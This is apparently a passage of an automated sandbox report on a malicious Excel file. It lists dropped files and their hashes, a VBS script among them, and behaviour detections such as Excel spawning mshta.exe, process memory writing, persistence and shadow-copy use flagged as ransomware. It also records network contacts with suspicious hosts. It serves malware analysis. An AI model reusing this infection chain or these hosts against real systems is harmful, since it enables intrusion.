SHA512 fbcceaea137312e23f0480265b1e8e10c7f68f73346b08595a2e8b6b7d56f6fd764d1f6948da57f0e129019e71d0e2039924e4df0bc757fb7554ea1346aa96f5

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CSM0DA6Y469005TMZVVM.temp

MD5 68bd31e6547cdf0f6b6726cbea800f56
SHA1 977363cd19dfc030c2c2ec540d0346922e46e841
SHA256 0b58f5155c3ca16b7648d0fbfe4d654985a691b5fe943129fe00c4778d9de130
SHA512 57d7a3ed58235ba2de6140f063687b39f3c94b913748b2ff8ebc5ad8108593c63cfe5bd23df959bb3c58031e3d0112da5d7d55a811847389a72381cb6570dad3

\??\c:\Users\Admin\AppData\Local\Temp\clbffc8o.cmdline

MD5 cee59847281c003ac966e2b8387a18b2
SHA1 1f7333e7e311f4b5c719bbbad6b1734187d51a0c
SHA256 0836e6c4c1c6a23f3d77c513130d139af1c345d08cf1288623377f0ef6123407
SHA512 92b9e0aa499f58ba092e980f2f528fa499e3f639598da3f7163344c4f119b8901558840c0762d643aeb648d33a74f954e0f9991af381d1b076a4c833300b5929

\??\c:\Users\Admin\AppData\Local\Temp\clbffc8o.0.cs

MD5 39d4a6691d37c11ed58d537b74f12aad
SHA1 caa119f2a0ad6f53ddb8a2447b379ac5ed11c1d6
SHA256 0ad0cda12412bd6fa525c0e4f876fb02a55a98e7555e5a43423c577465611df1
SHA512 f4d2f58e0c3a15aec4dd83b4268e9a4c1f3b5ef3c735204457e2115b9835af874f4d34b7311a182e7b395888b523e9f46bb8b6ca08db60ad9eda04b89013813c

C:\Users\Admin\AppData\Local\Temp\clbffc8o.pdb

MD5 3040b1e499cca7b496da428300cb1788
SHA1 8237f76c132ece236aee66ea7ae4a3b16e164334
SHA256 38ea0d12e93c4cc8c91c6de3b903854c96993964d9b75a2096a785fa1e44d32a
SHA512 b61590c8ad29447e6d4585088d05e09518a726d002fabe291fe1f5ae13e7223406358814dc700aa65a639e8f4353bf11a89107256008b28c8dc739135a16c9ee

C:\Users\Admin\AppData\Local\Temp\clbffc8o.dll

MD5 e51a3a163b0ea2a5c3365e8cd5857226
SHA1 1e4f27d69a9764558ef73f31f1f34edb2c6a18db
SHA256 a4b61fe3bb65cb54586ba22870fcbe371bb1abd696d3d58ccc4e2545013ad959
SHA512 8380363d1793ccc2cf2a7e52653b40526f03cd60914159c1f101155c0ba6b2e63364ca0931314b9699f845bff2d535d2f78ecb974ddcd38792b754aceec2242a

C:\Users\Admin\AppData\Local\Temp\RESD682.tmp

MD5 a168413d00e1173092bf4047235bb7e5
SHA1 18a413a31b668f736bbb906a8228b78824d00e6b
SHA256 aa12d23a40d81a523de14ed101e7cfd2349b9ad3339d3d96d5d4ddbee1a187f1
SHA512 1034d0c77bd55b14b3546696db06ee055e98fd770d1e9d69191c7c6e5e2733ff588c60988a1aa63e0f5026419d40cd355194b11d34487e4982f54ffa8bb613a9

\??\c:\Users\Admin\AppData\Local\Temp\CSCD681.tmp

MD5 bbc3f888ff3d1900f18f75ad99282ee2
SHA1 7a21c55f7bfa9dba6fd0ac83fcebd487df3c8566
SHA256 5a9ec907bc757f9dd645b36b5a1903b07db9aa7a69ec99805f63ce046651796d
SHA512 254451ef624033d835281e490e87b83dc2fbe1e580a6e8c2bed782d296e6c4eb20c1080cf07a1d6d2fdfce43b98299d7243ba89ec30c28430dda0c66db69c950

memory/2140-60-0x00000000720AD000-0x00000000720B8000-memory.dmp

C:\Users\Admin\AppData\Roaming\seethebestgirlseverdidbestthigns.vbs

MD5 8e033f9bcfdc081ed84adcbf69b2cfed
SHA1 29919300cdba9322ec872189cea15ff7d573fc42
SHA256 4d489671247459e4b2c1403511606a2463199f1a5044d7e1841e5387b8c86e0a
SHA512 58fca96df828c75274613291f1048228076ef0516d4bcdd4e51cba3d9c9c566b6ce5f03387bfd60cb627bbd8a799b37593fd3624574afd50f6df6f9777754ac0

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-13 03:03

Reported

2024-11-13 03:06

Platform

win10v2004-20241007-en

Max time kernel

143s

Max time network

139s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\ee6666aa9e5387583b1acb4e3684dfcb10c67d2fa6738b7ba07864b79976f2ed.xls"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\System32\mshta.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4528 wrote to memory of 4236 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe
PID 4528 wrote to memory of 4236 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\ee6666aa9e5387583b1acb4e3684dfcb10c67d2fa6738b7ba07864b79976f2ed.xls"

C:\Windows\System32\mshta.exe

C:\Windows\System32\mshta.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 roaming.officeapps.live.com udp
FR 52.109.68.129:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 97.32.109.52.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 4t.gg udp
KR 221.146.204.133:443 4t.gg tcp
US 8.8.8.8:53 129.68.109.52.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 r10.o.lencr.org udp
GB 2.23.210.75:80 r10.o.lencr.org tcp
US 198.46.178.192:80 198.46.178.192 tcp
US 8.8.8.8:53 133.204.146.221.in-addr.arpa udp
US 8.8.8.8:53 32.169.19.2.in-addr.arpa udp
US 8.8.8.8:53 75.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 192.178.46.198.in-addr.arpa udp
US 8.8.8.8:53 27.73.42.20.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 75.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp

Files

memory/4528-0-0x00007FFED83B0000-0x00007FFED83C0000-memory.dmp

memory/4528-1-0x00007FFF183CD000-0x00007FFF183CE000-memory.dmp

memory/4528-3-0x00007FFED83B0000-0x00007FFED83C0000-memory.dmp

memory/4528-2-0x00007FFED83B0000-0x00007FFED83C0000-memory.dmp

memory/4528-5-0x00007FFED83B0000-0x00007FFED83C0000-memory.dmp

memory/4528-4-0x00007FFED83B0000-0x00007FFED83C0000-memory.dmp

memory/4528-7-0x00007FFF18330000-0x00007FFF18525000-memory.dmp

memory/4528-6-0x00007FFF18330000-0x00007FFF18525000-memory.dmp

memory/4528-8-0x00007FFF18330000-0x00007FFF18525000-memory.dmp

memory/4528-10-0x00007FFF18330000-0x00007FFF18525000-memory.dmp

memory/4528-11-0x00007FFF18330000-0x00007FFF18525000-memory.dmp

memory/4528-12-0x00007FFED5CA0000-0x00007FFED5CB0000-memory.dmp

memory/4528-9-0x00007FFF18330000-0x00007FFF18525000-memory.dmp

memory/4528-13-0x00007FFED5CA0000-0x00007FFED5CB0000-memory.dmp

memory/4528-14-0x00007FFF18330000-0x00007FFF18525000-memory.dmp

memory/4528-17-0x00007FFF18330000-0x00007FFF18525000-memory.dmp

memory/4528-18-0x00007FFF18330000-0x00007FFF18525000-memory.dmp

memory/4528-20-0x00007FFF18330000-0x00007FFF18525000-memory.dmp

memory/4528-19-0x00007FFF18330000-0x00007FFF18525000-memory.dmp

memory/4528-16-0x00007FFF18330000-0x00007FFF18525000-memory.dmp

memory/4528-15-0x00007FFF18330000-0x00007FFF18525000-memory.dmp

memory/4236-38-0x00007FFF18330000-0x00007FFF18525000-memory.dmp

memory/4236-42-0x00007FFF18330000-0x00007FFF18525000-memory.dmp

memory/4528-45-0x00007FFF18330000-0x00007FFF18525000-memory.dmp

memory/4528-46-0x00007FFF183CD000-0x00007FFF183CE000-memory.dmp

memory/4528-47-0x00007FFF18330000-0x00007FFF18525000-memory.dmp

memory/4236-51-0x00007FFF18330000-0x00007FFF18525000-memory.dmp

memory/4236-52-0x00007FF7321D0000-0x00007FF7321D8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 1db43076453e25110d16a8013d558fe4
SHA1 20ad8372357cfa65ae3bcc38f448394c6c24d966
SHA256 3e973311136c5bbed135265e2facc151547b9424856a31698c2b9bfb73a571b5
SHA512 5e15a6d91c6a175cc92e5ceac2c98277df674aac82f7cdf1c6d9222f945044b00666bb1efd6485384efc1791bad09086f178baf76c7096d7cc9bb9b5df150355